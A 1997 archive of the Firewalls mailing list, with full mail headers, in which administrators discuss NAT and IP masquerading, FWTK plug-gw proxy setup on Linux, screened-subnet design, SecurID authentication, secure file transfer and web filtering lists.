Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in what way are application level gateways more secure than, say, FW-1 or PIX? There are certainly capabilities that can be provided via application proxies that can't be provided by any filter-based technologies, but what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't?

-- Mike Jones Sr.
Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Tue Jun 3 06:30:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA21828 for firewalls-outgoing; Tue, 3 Jun 1997 06:28:40 -0700 (PDT) Received: from bings.kpmg.co.at (bings.kpmg.co.at [193.154.65.9]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA21820 for ; Tue, 3 Jun 1997 06:28:33 -0700 (PDT) Received: (from daemon@localhost) by bings.kpmg.co.at (8.8.3/8.8.3) id PAA06533 for ; Tue, 3 Jun 1997 15:49:42 +0200 Received: from fiss.kpmg.co.at(193.80.10.3) via SMTP by bings.kpmg.co.at, id smtpd06529aaa; Tue, 3 Jun 97 15:49:34 +0200 Received: from bings.kpmg.co.at (vtcpuser@bings.kpmg.co.at [193.80.11.9]) by fiss.kpmg.co.at (8.8.5/8.8.5) with SMTP id PAA32749 for ; Tue, 3 Jun 1997 15:33:26 +0200 Date: Tue, 03 Jun 1997 15:28:39 +0100 From: "Willibald Kraml" To: firewalls@GreatCircle.COM Subject: Re: Difference between NAT and IP Masquerading Message-ID: <2063292994.865351719@bings.kpmg.co.at> X-Mailer: Mulberry (Win32) [1.2.0, s/n Evaluation] X-Authenticated: wkraml by fiss.kpmg.co.at X-Licensed-To: Unlicensed - for evaluation only MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --On Dienstag, 03. Juni 1997, 00:53 -0700 "Tony Rall" wrote: > >>Could someone explain the difference between Network Address Translation >>and IP Masquerading. Which is better to use? What firewall products >>offer which? > NAT supports hiding n internal addresses behind m external addresses, where n is > usually less than m. > > IPMasq is a subset of NAT where n=1. > > One of these is likely available on a number of products; IBM's Firewall (nee > SNG) supports NAT. 
>
> Tony Rall
>

With Linux, IP masquerading hides n internal addresses behind (normally) 1 external address; n usually is at least 2 (one network interface on the masquerading box and at least one client on the internal network). The external address can also be a dynamic IP address, so you can connect a LAN to the Internet with a dial-up IP connection ...

Willi Kraml

From owner-firewalls-outgoing Tue Jun 3 07:13:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA23283 for firewalls-outgoing; Tue, 3 Jun 1997 06:46:22 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA23267 for ; Tue, 3 Jun 1997 06:46:16 -0700 (PDT) Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id JAA17464 for ; Tue, 3 Jun 1997 09:49:17 -0400 (EDT) Message-Id: <199706031349.JAA17464@mail.clark.net> Comments: Authenticated sender is From: "Marcus J. Ranum" Organization: Network Flight Recorder, Inc. To: Firewalls@GreatCircle.COM Date: Tue, 3 Jun 1997 09:47:53 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Plug-gw- One to many relationship Reply-to: mjr@clark.net In-reply-to: <199706030631.XAA11683@honor.greatcircle.com> X-mailer: Pegasus Mail for Win32 (v2.53/R1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?

The one to many support requires kernel modifications in order to work. Basically, you need code that absorbs all packets going through the firewall, and then pulls the "real" destination out of the routing layer and connects to it. So, unless you want to spend a month or so on writing some pretty subtle kernel hacks, you can't do it with just FWTK.

mjr.
-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc. Personal Work New Book!!
From owner-firewalls-outgoing Tue Jun 3 07:31:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA26087 for firewalls-outgoing; Tue, 3 Jun 1997 07:18:41 -0700 (PDT) Received: from calamari.Progressive-Systems.Com (calamari.Progressive-Systems.Com [206.236.37.16]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA26060 for ; Tue, 3 Jun 1997 07:18:32 -0700 (PDT) Received: (from ge@localhost) by calamari.Progressive-Systems.Com (8.7.5/8.7.3) id KAA19020 for Firewalls@GreatCircle.COM; Tue, 3 Jun 1997 10:22:08 -0400 (EDT) From: "Ge' Weijers" Message-Id: <199706031422.KAA19020@calamari.Progressive-Systems.Com> Subject: Re: ipfwadm question To: Firewalls@GreatCircle.COM Date: Tue, 3 Jun 1997 10:22:08 -0400 (EDT) In-Reply-To: <199706030631.XAA11683@honor.greatcircle.com> from "Firewalls-Digest" at Jun 2, 97 11:31:23 pm Reply-To: ge@progressive-systems.com (Ge' Weijers) Organization: Progressive Systems, Inc. X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>        Gateway Box
>            |
>            |
>       Firewall Box
>            |
>            |
>        LAN Router
>         /  |  \
>        /   |   \
>       /    |    \
>  Node 1   Node 2   Node 3
>

This picture is correct, a 'firewall' is sitting between the Big Bad Internet and your LAN. The 'LAN Router' would be missing at small sites.

This design has its drawbacks if any of 'Node 1..3' has to be accessible from the Internet. Say if Node 1 receives e-mail it can be vulnerable to breakins. Anyone breaking into this machine can then use it as a stepping stone to attack the rest of your network. You may want to place some hosts on the Internet side of the firewall to prevent that from happening. If your Internet gateway has a static packet filtering capability you can further limit your vulnerability by implementing a screened subnet.

             .------------.        .------------.
Internet     |            |        |            |
-------------|  Gateway   |--+-----|  Firewall  |-----+----------+-- . . .
             |            |  |     |  (Linux)   |     |          |
             '------------'  |     '------------'     |          |
              .--------------+                        |          |
              |              |                        |          |
          .-------.     .---------.              .--------. .---------.
          |  Mail |     |  File   |              |  User  | |  User   |
          |  Host |     | Server  |              |   PC   | |   PC    |
          '-------'     '---------'              '--------' '---------'

I left out your router as it's irrelevant to the discussion. If you put a couple of network cards in the firewall host it can double as a router too.

I'm doing just that at the moment, we're running a gateway system with a dynamic packet filter (a MorningStar SecureConnect) and a Linux box acts as a router and static packet filter. We also run the TIS firewall toolkit on the Linux box to allow limited inbound access, though I prefer SSH for that purpose.

Ge'

From owner-firewalls-outgoing Tue Jun 3 08:00:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA26623 for firewalls-outgoing; Tue, 3 Jun 1997 07:24:30 -0700 (PDT) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA26561 for ; Tue, 3 Jun 1997 07:24:05 -0700 (PDT) Received: by brimstone.rnb.com; id KAA13523; Tue, 3 Jun 1997 10:27:36 -0400 Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma013390; Tue, 3 Jun 97 10:27:16 -0400 Received: from monarch.rnb.com (monarch [150.1.29.115]) by relay.rnb.com (8.8.5/8.8.5) with SMTP id KAA10251; Tue, 3 Jun 1997 10:27:15 -0400 (EDT) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified.
Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Message-ID: X-Mailer: XFMail 1.2-alpha [p0] on Solaris Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <199706021753.KAA29975@cactus.tc.pw.com> Date: Tue, 03 Jun 1997 10:23:06 -0400 (EDT) Organization: Republic National Bank From: Ken Kempster To: Char_Sample@notes.pw.com, fwtk , firewalls Subject: Plug-gw- One to many relationship more specific info Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On 02-Jun-97 Char_Sample@notes.pw.com wrote:
>I've generally had good luck doing it w/ Gauntlet. There really is no
>difference.
>Do you have the plug going one way or both ways?

This is what I'm trying to do: I currently have a full blown Gauntlet 3.2 running on Solaris. The feature that I need which Gauntlet does not support is service port pools. IE: I want to be able to configure a proxy to listen to mult. service ports or pass traffic at the NAT level on a group of source and destination service ports. Gauntlet has IPFS but this is a one to all, all to one, one to one, or all to all relationship when it comes to service ports. You can not configure IPFS for a group of ports. Yes, IPFILTER does support this but I can't install it on top of the full blown Gauntlet.

So, what I was thinking of doing was using FWTK with IPFILTER. But then you run into the problem of being able to configure a plug-gw that will pass from a single IP to multiple IPs. Plug-gw has to be able to rec. when IPFILTER passes a request to it; the plug needs to pull its destination from that request, like Gauntlet's plug.

I am using this box to firewall market data services and it's very difficult to accommodate all their requirements on one box. So, this is my problem. If anyone has other suggestions I can try, please let me know.

thanx for any help.
>
> char
> To: fwtk-users @ tis.com @ Internet, firewalls @ greatcircle.com @ Internet
> cc:
> From: kempster @ monarch.rnb.com @ Internet
> Date: 06/02/97 10:31:54 AM
> Subject: Plug-gw- One to many relationship
>
> Hi all,
>
> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
>
> thanx for any help.
>
> |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
> | Ken Kempster kempster@monarch.rnb.com |
> | Network Systems Engineer _\|/_ |
> | Republic National Bank (o o) |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~
>
> /* ******************************************************************************* ************* */
> /* char sample; that really is my name */
> /* phone: (410)412-8161 */
> /* e-mail: char_sample@notes.pw.com */
> /* ******************************************************************************* ************* */

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster kempster@monarch.rnb.com |
| Network Systems Engineer _\|/_ |
| Republic National Bank (o o) |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~

From owner-firewalls-outgoing Tue Jun 3 09:55:06 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA14142 for firewalls-outgoing; Tue, 3 Jun 1997 09:43:14 -0700 (PDT)
Received: from nebula.is.rpslmc.edu (nebula.is.rpslmc.edu [144.74.19.111]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA14120 for ; Tue, 3 Jun 1997 09:43:08 -0700 (PDT)
Received: (qmail 4721 invoked by uid 2001); 3 Jun 1997 16:51:03 -0000
Date: Tue, 3 Jun 1997 11:51:02 -0500 (CDT)
From: "Daniel G. Drumm"
To: "Kohn, Joav"
cc: "'firewalls@greatcircle.com'"
Subject: Re: SecureID, CryptoCard, etc...
In-Reply-To: <0C673F68C3A0D011A94208002BE52625351C@USBGREXCH01>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 30 May 1997, Kohn, Joav wrote:

> sorry for the off-topic post, but:
>
> anybody using keycard authentication to authenticate users in a
> winNT/win95 environment?
>
> my CEO has gone security crazy and would like to implement keycard
> authentication across the entire organization. so far, the vendors
> haven't been much help with advice on how to get win95 to authenticate
> with the cards. any information would be greatly appreciated.
>
> tia,
> -joav kohn
> sr. technical consultant
> it/workgroup communications
> landis & staefa
>
> (p.s.. this is for LAN/WAN access, not dial-in)

Why would the environment have much to do with it? FW1 or TIS Gauntlet come with support for Secure/ID; you can have your employees get these cards and authenticate against the firewall. You can then set a user-by-user policy as to what they are allowed access to, and how long they can access it for.

--
Daniel G. Drumm - ddrumm@rush.edu
Rush Presbyterian St. Luke's Medical Center - Chicago, IL
Network Division - Information Services

From owner-firewalls-outgoing Tue Jun 3 10:00:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA15237 for firewalls-outgoing; Tue, 3 Jun 1997 09:53:40 -0700 (PDT)
Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA15221 for ; Tue, 3 Jun 1997 09:53:34 -0700 (PDT)
Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id JAA06233; Tue, 3 Jun 1997 09:57:09 -0700 (PDT)
Date: Tue, 3 Jun 1997 09:57:08 -0700 (PDT)
From: "Sameer R. Manek"
To: Warpy
cc: firewalls@GreatCircle.COM
Subject: Re: SSH Equiv for FTP?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 2 Jun 1997, Warpy wrote:

> I was wondering whether there was an equivalent to SSH for ftp. Does
> anyone know if there is?
>
> Warpy
>

The ssh "package" is supposed to be a replacement for the rsh suite, so ssh comes with ssh, slogin and scp. So scp is the default file copy method, though you can proxy a port via ssh, so if you wanted to, in theory you can proxy ftp via ssh. I've never tried it out, so I'm not sure how difficult it is, or how practical. I find scp is a lot easier to use.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek manek@challenger.atc.fhda.edu
The last four line .signature file on the entire internet
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From owner-firewalls-outgoing Tue Jun 3 10:46:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20475 for firewalls-outgoing; Tue, 3 Jun 1997 10:43:14 -0700 (PDT)
Received: from mail.diginsite.com (mail.diginsite.com [208.2.189.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA20436 for ; Tue, 3 Jun 1997 10:43:00 -0700 (PDT)
Received: from march.diginsite.com (march.diginsite.com [208.2.189.102]) by mail.diginsite.com (8.8.5/8.8.3) with ESMTP id KAA06986 for ; Tue, 3 Jun 1997 10:44:49 -0700
Message-Id: <199706031744.KAA06986@mail.diginsite.com>
From: "David Lang"
To:
Subject: NAT on linux firewall?
Date: Tue, 3 Jun 1997 09:45:44 -0700
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have had several requests for the summary of NAT on Linux, so I am posting this to the list.
Many thanks to Greg Haverkamp, who was able to figure this out in the first place and let me know.

David Lang

What I found that you can do if you have a finite list of connections you are trying to make (I am connecting many web sites that are inside to the outside) is as follows.

Using Linux kernel version 2.0.30 with FWTK 2:

  real IP address of f/w                     200.200.200.1
  addresses the web sites should appear as   200.200.200.2 to 200.200.200.200
  real IP addresses of web sites             100.100.100.2 to 100.100.100.200

for 199 web sites.

For each web site do the following:

Set up the alias:

  ifconfig eth0:2 200.200.200.2

Set up an input firewall filter (I created a file rc.fw that I run after rc.inet1):

  ipfwadm -I -a accept -r 10002 -S 0/0 -D 200.200.200.2 80
  ipfwadm -I -a accept -r 11002 -S 0/0 -D 200.200.200.2 443

Start up two copies of the plug-gw (from the TIS Firewall Toolkit):

  /usr/local/etc/plug-gw -daemon 10002 plug-gw
  /usr/local/etc/plug-gw -daemon 11002 plug-gw

The following two rules should appear in the /usr/local/etc/netperm-table:

  plug-gw:port 10002 * -plug-to 100.100.100.2 -port 80
  plug-gw:port 11002 * -plug-to 100.100.100.2 -port 443

What this does:

The ifconfig sets the alias so the firewall will listen to the port. The input filters accept an incoming packet from anywhere addressed to 200.200.200.2 on port 80 and change it to arrive at port 10002. The plug-gw then listens at port 10002 and plugs anything it hears to 100.100.100.2 port 80 (standard http port). The other set does the same for the https ssl connection.

To do this you need to have experimental options turned on, normal firewall and forwarding options turned on, and the EXPERIMENTAL IP_TRANSPARENT_PROXY must be turned on for the -r option to work in ipfwadm.

This is a very ugly way to do this, but it does work. Let me know if you have any other questions.
David Lang

From owner-firewalls-outgoing Tue Jun 3 11:00:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20799 for firewalls-outgoing; Tue, 3 Jun 1997 10:45:45 -0700 (PDT)
Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA20727 for ; Tue, 3 Jun 1997 10:45:24 -0700 (PDT)
Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id MAA09659; Tue, 3 Jun 1997 12:43:22 -0500
Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma009639; Tue Jun 3 12:43:13 1997
Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id MAA25390; Tue, 3 Jun 1997 12:47:37 -0500 (CDT)
Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id MAA05711; Tue, 3 Jun 1997 12:48:08 -0500 (CDT)
Date: Tue, 3 Jun 1997 12:48:08 -0500 (CDT)
From: Ken Hardy
Message-Id: <199706031748.MAA05711@binki.bridge.com>
To: warpy@null.net
Subject: Re: SSH Equiv for FTP?
Cc: firewalls@greatcircle.com
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 2 Jun 1997, Warpy wrote:

> I was wondering whether there was an equivalent to SSH for ftp. Does
> anyone know if there is?
>
> Warpy
>

The SSLeay package has an implementation of SSL-enabled ftp & ftpd, both of which can also interoperate with vanilla counterparts.
http://www.psy.uq.oz.au/~ftp/Crypto

From owner-firewalls-outgoing Tue Jun 3 11:15:48 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA23425 for firewalls-outgoing; Tue, 3 Jun 1997 11:04:52 -0700 (PDT)
Received: from stargate.concorde.com (concorde.com [206.137.224.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA23408 for ; Tue, 3 Jun 1997 11:04:45 -0700 (PDT)
Received: (from smap@localhost) by stargate.concorde.com (8.6.8.1/8.6.6) id OAA09131; Tue, 3 Jun 1997 14:05:55 -0400
Received: from bheema(198.242.54.246) by stargate via smap (V2.0) id xma009116; Tue, 3 Jun 97 14:05:31 -0400
Received: from bheema (bheema [198.242.54.246]) by bheema.concorde.com (8.7.5/8.7.3) with SMTP id OAA01750; Tue, 3 Jun 1997 14:05:36 -0400 (EDT)
Date: Tue, 3 Jun 1997 14:05:36 -0400 (EDT)
From: Srinivas Yalavarthy
X-Sender: srini@bheema
To: fwtk-users@tis.com, firewalls@greatcircle.com
Subject: Blocking unwanted junk mail using FWTK
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I would like to know if it's possible to block junk mail using "smap" in FWTK 2.0.

If anybody has done this before, I would appreciate it if you could share it with me.
Thanks - Srinivas

From owner-firewalls-outgoing Tue Jun 3 12:00:29 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA28171 for firewalls-outgoing; Tue, 3 Jun 1997 11:49:18 -0700 (PDT)
Received: from mercury.house.gov (mercury.house.gov [143.231.1.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA28138 for ; Tue, 3 Jun 1997 11:49:10 -0700 (PDT)
Received: from msg07.house.gov (msg07.house.gov [143.231.207.204]) by mercury.house.gov with SMTP (8.7.1/8.7.1) id OAA22482 for ; Tue, 3 Jun 1997 14:59:15 -0400 (EDT)
Received: by msg07.house.gov with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC702D.F0E9E1B0@msg07.house.gov>; Tue, 3 Jun 1997 14:53:47 -0400
Message-ID:
From: "Forno, Richard"
To: "'Kohn, Joav'" , "'Daniel G. Drumm'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: SecureID, CryptoCard, etc...
Date: Tue, 3 Jun 1997 14:53:46 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

SecurID has an NT/95 workstation client for one-pass authentication.

> ----------
> From: Daniel G. Drumm[SMTP:dgd@nebula.is.rpslmc.edu]
> Sent: Tuesday, June 3, 1997 12:51 PM
> To: Kohn, Joav
> Cc: 'firewalls@greatcircle.com'
> Subject: Re: SecureID, CryptoCard, etc...
>
> On Fri, 30 May 1997, Kohn, Joav wrote:
>
> > sorry for the off-topic post, but:
> >
> > anybody using keycard authentication to authenticate users in a
> > winNT/win95 environment?
> >
> > my CEO has gone security crazy and would like to implement keycard
> > authentication across the entire organization. so far, the vendors
> > haven't been much help with advice on how to get win95 to authenticate
> > with the cards. any information would be greatly appreciated.
> >
> > tia,
> > -joav kohn
> > sr. technical consultant
> > it/workgroup communications
> > landis & staefa
> >
> > (p.s.. this is for LAN/WAN access, not dial-in)
>
> Why would the environment have much to do with it? FW1 or TIS Gauntlet
> come with support for Secure/ID, you can have your employees get these
> cards, and authenticate against the Firewall. You can then set a
> user-by-user policy as to what they are allowed access to, and how long
> they can access it for.
>
> --
> Daniel G. Drumm - ddrumm@rush.edu
> Rush Presbyterian St. Luke's Medical Center - Chicago, IL
> Network Division - Information Services
>
>

From owner-firewalls-outgoing Tue Jun 3 12:45:25 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03214 for firewalls-outgoing; Tue, 3 Jun 1997 12:32:24 -0700 (PDT)
Received: from omsk.quadrix.com (omsk.quadrix.com [208.210.34.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA03196 for ; Tue, 3 Jun 1997 12:32:14 -0700 (PDT)
Received: from jukyu.quadrix.com by omsk.quadrix.com (4.1/SMI-4.1) id AA17678; Tue, 3 Jun 97 15:35:18 EDT
Date: Tue, 3 Jun 97 15:35:17 EDT
Message-Id: <9706031935.AA17678@omsk.quadrix.com>
From: Bill Van Emburg
To: ss1011@bbtnet.com
Subject: RE: Does Raptor WebNOT Block Legitimate Sites?
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I don't think you meant to send this to the firewalls list, but I'll offer you some info anyway....

Date: Mon, 2 Jun 1997 15:19:12 -0400
From: Tim Thayer

Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com

Tim Thayer

--------------------------------

> Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST)
> From: Allen Rogers
> Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
>
>
> This is a list that Raptor licenses directly from Microsystems. The actual
> URLs used, and their abbreviated nature, is due to how Microsystems chooses
> to create their list. I am trying to open a formal path where our customers
> can present queries/requests to them directly for particular sites. I will
> keep you posted.
>

The problem is, as was mentioned in the part of the message I deleted, that the URLs are truncated. All the filtering services have their problems; this is one of the bigger ones. Sometimes, sites also get blocked because they are critical of the filtering companies....

In any case, visit:

http://cgi.pathfinder.com/@@qO5IngUAPMqarMCj/netly/spoofcentral/censored/

They will give you some more info, and also the ability to check whether a particular site is blocked by several of the most common filtering programs.

--
-- Bill Van Emburg Phone: 908-235-2335
Quadrix Solutions, Inc. Fax: 908-235-2336
(bve@quadrix.com) Check out http://yourtown.com!
(http://quadrix.com) "You do what you want, and if you didn't, you don't"

From owner-firewalls-outgoing Tue Jun 3 14:03:22 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08744 for firewalls-outgoing; Tue, 3 Jun 1997 13:31:09 -0700 (PDT)
Received: from cih-gw.cih.com ([204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08670 for ; Tue, 3 Jun 1997 13:30:51 -0700 (PDT)
Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id QAA30042; Tue, 3 Jun 1997 16:35:40 -0400
X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f
Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd30040aaa; Tue Jun 3 20:35:36 1997
Date: Tue, 3 Jun 1997 16:35:36 -0400 (EDT)
From: "Craig I. Hagan"
Reply-To: hagan@cih.com
To: Srinivas Yalavarthy
cc: fwtk-users@tis.com, firewalls@GreatCircle.COM
Subject: Re: Blocking unwanted junk mail using FWTK
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Hi,
>
> I would like to know if it's possible to block junk mail
> using "smap" in FWTK 2.0.
>
> If anybody done this before, I would appreciate if you can share
> it with me.

check out http://www.cih.com/~hagan/smap-hacks

does exactly what you are looking for (I think).

-- craig

-------------------------------------------------------------------------------
Craig I. Hagan "It's a small world, but I wouldn't want to back it up"
hagan@cih.com "True hackers don't die, their ttl expires"
"It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Tue Jun 3 14:16:09 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA13102 for firewalls-outgoing; Tue, 3 Jun 1997 14:10:57 -0700 (PDT)
Received: from libofmich.lib.mi.us (libofmich.lib.mi.us [198.109.128.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA13092 for ; Tue, 3 Jun 1997 14:10:51 -0700 (PDT)
Received: by libofmich.lib.mi.us (AIX 3.2/UCB 5.64/4.03) id AA41995; Tue, 3 Jun 1997 17:16:44 -0400
Date: Tue, 3 Jun 1997 17:16:44 -0400 (EDT)
From: "Amy (Cremer) Briggs"
To: firewalls@greatcircle.com
Subject: Solaris
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

First of all, if there is a better list to post this to, please let me know. I've checked out Sun's web site and didn't find any mention of a Solaris listserv.

Does anyone know how you can trick a Solaris box into treating a class C address as a class B? For example, we want to use 2xx.xx.0.0 as a class B address. I've entered the class B subnet mask for this network in the /etc/netmasks file, which is how I thought you could do it, but it isn't working for me. It still thinks it's a class C address and won't route properly if I set up my routes using it as a class B address.
Finding a way to make this work would save me hours of time, because I have 5 full class B (technically class C) networks to do this for, and entering all the class C's within all 5 class B's would take me a while as well as complicate my routing table.

Thanks for any help or information you can give me.

Amy

\\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist///////////////
Library of Michigan amyc@libofmich.lib.mi.us
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////////////////
** It's not what you've got, it's what you give--TESLA **

From owner-firewalls-outgoing Tue Jun 3 15:00:19 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15802 for firewalls-outgoing; Tue, 3 Jun 1997 14:41:47 -0700 (PDT)
Received: from snoopy.hypercon.com (mail2.concom.com [198.64.246.149]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15770 for ; Tue, 3 Jun 1997 14:41:38 -0700 (PDT)
Received: from pitbull.ep.hess.com ([207.51.255.129]) by snoopy.hypercon.com (post.office MTA v1.9.1 ID# 0-11151) with SMTP id AAA164 for ; Tue, 3 Jun 1997 16:48:09 -0500
Received: from hac31d.ep.hess.com ([15.43.4.161]) by pitbull.ep.hess.com via smtpd (for mail2.concom.com [198.64.246.149]) with SMTP; 3 Jun 1997 21:45:09 UT
Message-ID: <3394907A.42F9@hypercon.com>
Date: Tue, 03 Jun 1997 16:45:30 -0500
From: msquared
Reply-To: msquared@hypercon.com
X-Mailer: Mozilla 3.0 (Win95; U)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: RAPTOR WEBNOT SITE BLOCKING
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It was written:

" > From: Allen Rogers
> Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
>
>
> This is a list that Raptor licenses directly from Microsystems. The actual
> URLs used, and their abbreviated nature, is due to how Microsystems chooses
> to create their list. I am trying to open a formal path where our customers
> can present queries/requests to them directly for particular sites. I will
> keep you posted."

CyberPatrol gives two forms at their site for 1) adding a site to the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm. I've seen them take action in as little as two hours. They have always responded the next business day with a confirming mail note.

Mike

From owner-firewalls-outgoing Tue Jun 3 16:02:08 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA19417 for firewalls-outgoing; Tue, 3 Jun 1997 15:06:32 -0700 (PDT)
Received: from ren.globecomm.net (ren.globecomm.net [207.51.48.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA19383 for ; Tue, 3 Jun 1997 15:06:22 -0700 (PDT)
